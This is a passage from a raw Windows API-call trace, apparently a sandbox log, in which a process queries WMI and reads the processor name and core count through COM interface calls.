WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eab4 | out: ppvObject=0x19eab4*=0x0) returned 0x80004002 [0268.380] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e88c | out: ppvObject=0x19e88c*=0x0) returned 0x80004002 [0268.448] WbemLocator:IUnknown:AddRef (This=0x66fb70) returned 0x3 [0268.448] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5f4 | out: ppvObject=0x19e5f4*=0x0) returned 0x80004002 [0268.448] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5a4 | out: ppvObject=0x19e5a4*=0x0) returned 0x80004002 [0268.449] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5b0 | out: ppvObject=0x19e5b0*=0x66facc) returned 0x0 [0268.449] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66facc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5b8 | out: pCid=0x19e5b8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0268.449] WbemLocator:IUnknown:Release (This=0x66facc) returned 0x3 [0268.449] CoGetContextToken (in: pToken=0x19e610 | out: pToken=0x19e610) returned 0x0 [0268.449] CoGetContextToken (in: pToken=0x19ea18 | out: pToken=0x19ea18) returned 0x0 [0268.449] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eaa8 | out: ppvObject=0x19eaa8*=0x66fb54) returned 0x0 [0268.449] WbemLocator:IRpcOptions:Query (in: This=0x66fb54, pPrx=0x66fb70, dwProperty=2, pdwValue=0x19ead0 | out: pdwValue=0x19ead0) returned 0x80004002 [0268.449] WbemLocator:IUnknown:Release (This=0x66fb54) returned 0x3 [0268.449] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x2 [0268.450] CoGetContextToken (in: pToken=0x19eff0 | out: pToken=0x19eff0) returned 0x0 [0268.450] CoGetContextToken (in: pToken=0x19ef50 | out: pToken=0x19ef50) returned 0x0 [0268.450] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x19f020*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f01c | out: ppvObject=0x19f01c*=0x6636b8) returned 0x0 [0268.450] IUnknown:AddRef (This=0x6636b8) returned 0x4 [0268.450] IUnknown:Release (This=0x6636b8) returned 0x3 [0268.450] IUnknown:Release (This=0x6636b8) returned 0x2 [0268.450] IUnknown:Release (This=0x663848) returned 0x2 [0268.450] SysStringLen (param_1=0x0) returned 0x0 [0268.450] IEnumWbemClassObject:Reset (This=0x6636b8) returned 0x0 [0268.451] CoTaskMemAlloc (cb=0x4) returned 0x54ba5a8 [0268.451] IEnumWbemClassObject:Next (in: This=0x6636b8, lTimeout=-1, uCount=0x1, apObjects=0x54ba5a8, puReturned=0x226a63c | out: apObjects=0x54ba5a8*=0x5539478, puReturned=0x226a63c*=0x1) returned 0x0 [0279.220] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e8a0 | out: ppvObject=0x19e8a0*=0x5539478) returned 0x0 [0279.220] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e85c | out: ppvObject=0x19e85c*=0x0) returned 0x80004002 [0279.220] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e67c | out: ppvObject=0x19e67c*=0x0) returned 0x80004002 [0279.220] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e454 | out: ppvObject=0x19e454*=0x0) returned 0x80004002 [0279.221] IUnknown:AddRef (This=0x5539478) returned 0x3 [0279.221] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e1bc | out: ppvObject=0x19e1bc*=0x0) returned 0x80004002 [0279.221] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e16c | out: ppvObject=0x19e16c*=0x0) returned 0x80004002 [0279.221] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e178 | out: ppvObject=0x19e178*=0x553947c) returned 0x0 [0279.221] IMarshal:GetUnmarshalClass (in: This=0x553947c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e180 | out: pCid=0x19e180*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.221] IUnknown:Release (This=0x553947c) returned 0x3 [0279.221] CoGetContextToken (in: pToken=0x19e1d8 | out: pToken=0x19e1d8) returned 0x0 [0279.222] CoGetContextToken (in: pToken=0x19e5e0 | out: pToken=0x19e5e0) returned 0x0 [0279.222] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e670 | out: ppvObject=0x19e670*=0x0) returned 0x80004002 [0279.222] IUnknown:Release (This=0x5539478) returned 0x2 [0279.222] CoGetContextToken (in: pToken=0x19ebb0 | out: pToken=0x19ebb0) returned 0x0 [0279.222] CoGetContextToken (in: pToken=0x19eb10 | out: pToken=0x19eb10) returned 0x0 [0279.222] IUnknown:QueryInterface (in: This=0x5539478, riid=0x19ebe0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ebdc | out: ppvObject=0x19ebdc*=0x5539478) returned 0x0 [0279.222] IUnknown:AddRef (This=0x5539478) returned 0x4 [0279.222] IUnknown:Release (This=0x5539478) returned 0x3 [0279.222] IUnknown:Release (This=0x5539478) returned 0x2 [0279.222] CoTaskMemFree (pv=0x54ba5a8) [0279.223] CoGetContextToken (in: pToken=0x19ef18 | out: pToken=0x19ef18) returned 0x0 [0279.223] IUnknown:AddRef (This=0x5539478) returned 0x3 [0279.223] IWbemClassObject:Get (in: This=0x5539478, wszName="__GENUS", lFlags=0, pVal=0x19f22c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f2ac*=0, plFlavor=0x19f2a8*=0 | out: pVal=0x19f22c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f2ac*=3, plFlavor=0x19f2a8*=64) returned 0x0 [0279.224] IWbemClassObject:Get (in: This=0x5539478, wszName="__PATH", lFlags=0, pVal=0x19f210*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f294*=0, plFlavor=0x19f290*=0 | out: pVal=0x19f210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x19f294*=8, plFlavor=0x19f290*=64) returned 0x0 [0279.225] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0279.225] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0279.225] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f23c | out: ppv=0x19f23c*=0x601a94) returned 0x0 [0279.226] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f234 | out: pAptType=0x19f234*=1) returned 0x0 [0279.226] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f238 | out: ppvObject=0x19f238*=0x0) returned 0x80004002 [0279.226] IUnknown:Release (This=0x601a94) returned 0x1 [0279.231] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eba8 | out: ppv=0x19eba8*=0x54ba558) returned 0x0 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba558, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19edc0 | out: ppvObject=0x19edc0*=0x0) returned 0x80004002 [0279.233] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba558, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edd4 | out: ppvObject=0x19edd4*=0x5542350) returned 0x0 [0279.233] WbemDefPath:IUnknown:Release (This=0x54ba558) returned 0x0 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9f4 | out: ppvObject=0x19e9f4*=0x5542350) returned 0x0 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9b0 | out: ppvObject=0x19e9b0*=0x0) returned 0x80004002 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5a4 | out: ppvObject=0x19e5a4*=0x0) returned 0x80004002 [0279.234] WbemDefPath:IUnknown:AddRef (This=0x5542350) returned 0x3 [0279.234] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e30c | out: ppvObject=0x19e30c*=0x0) returned 0x80004002 [0279.234] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e2bc | out: ppvObject=0x19e2bc*=0x0) returned 0x80004002 [0279.234] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2c8 | out: ppvObject=0x19e2c8*=0x55431c0) returned 0x0 [0279.234] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55431c0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e2d0 | out: pCid=0x19e2d0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.234] WbemDefPath:IUnknown:Release (This=0x55431c0) returned 0x3 [0279.234] CoGetContextToken (in: pToken=0x19e328 | out: pToken=0x19e328) returned 0x0 [0279.234] CoGetContextToken (in: pToken=0x19e730 | out: pToken=0x19e730) returned 0x0 [0279.234] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7c0 | out: ppvObject=0x19e7c0*=0x0) returned 0x80004002 [0279.234] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x2 [0279.234] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x1 [0279.234] CoGetContextToken (in: pToken=0x19f0b8 | out: pToken=0x19f0b8) returned 0x0 [0279.235] CoGetContextToken (in: pToken=0x19f018 | out: pToken=0x19f018) returned 0x0 [0279.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542350, riid=0x19f0e8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f0e4 | out: ppvObject=0x19f0e4*=0x5542350) returned 0x0 [0279.235] WbemDefPath:IUnknown:AddRef (This=0x5542350) returned 0x3 [0279.235] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x2 [0279.235] WbemDefPath:IWbemPath:SetText (This=0x5542350, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0279.235] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f268 | out: puCount=0x19f268*=0x2) returned 0x0 [0279.235] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f264*=0x0, pszText=0x0 | out: puBuffLength=0x19f264*=0xf, pszText=0x0) returned 0x0 [0279.235] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f264*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f264*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.236] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f234 | out: puCount=0x19f234*=0x2) returned 0x0 [0279.236] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f230*=0x0, pszText=0x0 | out: puBuffLength=0x19f230*=0xf, pszText=0x0) returned 0x0 [0279.236] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f230*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f230*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.236] IWbemClassObject:Get (in: This=0x5539478, wszName="Name", lFlags=0, pVal=0x19f230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226af1c*=0, plFlavor=0x226af20*=0 | out: pVal=0x19f230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x226af1c*=8, plFlavor=0x226af20*=0) returned 0x0 [0279.236] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0279.236] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0279.237] IWbemClassObject:Get (in: This=0x5539478, wszName="Name", lFlags=0, pVal=0x19f238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226af1c*=8, plFlavor=0x226af20*=0 | out: pVal=0x19f238*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x226af1c*=8, plFlavor=0x226af20*=0) returned 0x0 [0279.237] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0279.237] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0279.237] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f234 | out: puCount=0x19f234*=0x2) returned 0x0 [0279.237] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f230*=0x0, pszText=0x0 | out: puBuffLength=0x19f230*=0xf, pszText=0x0) returned 0x0 [0279.237] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f230*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f230*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.237] IWbemClassObject:Get (in: This=0x5539478, wszName="NumberOfCores", lFlags=0, pVal=0x19f230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226b028*=0, plFlavor=0x226b02c*=0 | out: pVal=0x19f230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x226b028*=19, plFlavor=0x226b02c*=0) returned 0x0 [0279.237] IWbemClassObject:Get (in: This=0x5539478, wszName="NumberOfCores", lFlags=0, pVal=0x19f238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226b028*=19, plFlavor=0x226b02c*=0 | out: pVal=0x19f238*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x226b028*=19, plFlavor=0x226b02c*=0) returned 0x0 [0279.242] CoTaskMemAlloc (cb=0x4) returned 0x54ba3e8 [0279.242] IEnumWbemClassObject:Next (in: This=0x6636b8, lTimeout=-1, uCount=0x1, apObjects=0x54ba3e8, puReturned=0x226a63c | out: apObjects=0x54ba3e8*=0x0, puReturned=0x226a63c*=0x0) returned 0x1 [0279.255] CoTaskMemFree (pv=0x54ba3e8) [0279.255] CoGetContextToken (in: pToken=0x19f168 | out: pToken=0x19f168) returned 0x0 [0279.255] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x1 [0279.255] IUnknown:Release (This=0x6636b8) returned 0x0 [0279.259] CoGetContextToken (in: pToken=0x19f168 | out: pToken=0x19f168) returned 0x0 [0279.259] WbemLocator:IUnknown:Release (This=0x66ea70) returned 0x1 [0279.259] IUnknown:Release (This=0x663848) returned 0x0 [0279.311] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f254 | out: ppv=0x19f254*=0x601a94) returned 0x0 [0279.311] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f24c | out: pAptType=0x19f24c*=1) returned 0x0 [0279.311] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f250 | out: ppvObject=0x19f250*=0x0) returned 0x80004002 [0279.311] IUnknown:Release (This=0x601a94) returned 0x1 [0279.312] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebc0 | out: ppv=0x19ebc0*=0x54ba528) returned 0x0 [0279.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba528, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19edd8 | out: ppvObject=0x19edd8*=0x0) returned 0x80004002 [0279.312] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba528, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edec | out: ppvObject=0x19edec*=0x5542510) returned 0x0 [0279.312] WbemDefPath:IUnknown:Release (This=0x54ba528) returned 0x0 [0279.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x5542510) returned 0x0 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9c8 | out: ppvObject=0x19e9c8*=0x0) returned 0x80004002 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5bc | out: ppvObject=0x19e5bc*=0x0) returned 0x80004002 [0279.313] WbemDefPath:IUnknown:AddRef (This=0x5542510) returned 0x3 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e324 | out: ppvObject=0x19e324*=0x0) returned 0x80004002 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e2d4 | out: ppvObject=0x19e2d4*=0x0) returned 0x80004002 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2e0 | out: ppvObject=0x19e2e0*=0x55433e8) returned 0x0 [0279.313] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55433e8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e2e8 | out: pCid=0x19e2e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.313] WbemDefPath:IUnknown:Release (This=0x55433e8) returned 0x3 [0279.313] CoGetContextToken (in: pToken=0x19e340 | out: pToken=0x19e340) returned 0x0 [0279.313] CoGetContextToken (in: pToken=0x19e748 | out: pToken=0x19e748) returned 0x0 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7d8 | out: ppvObject=0x19e7d8*=0x0) returned 0x80004002 [0279.313] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x2 [0279.313] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x1 [0279.313] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0279.313] CoGetContextToken (in: pToken=0x19f030 | 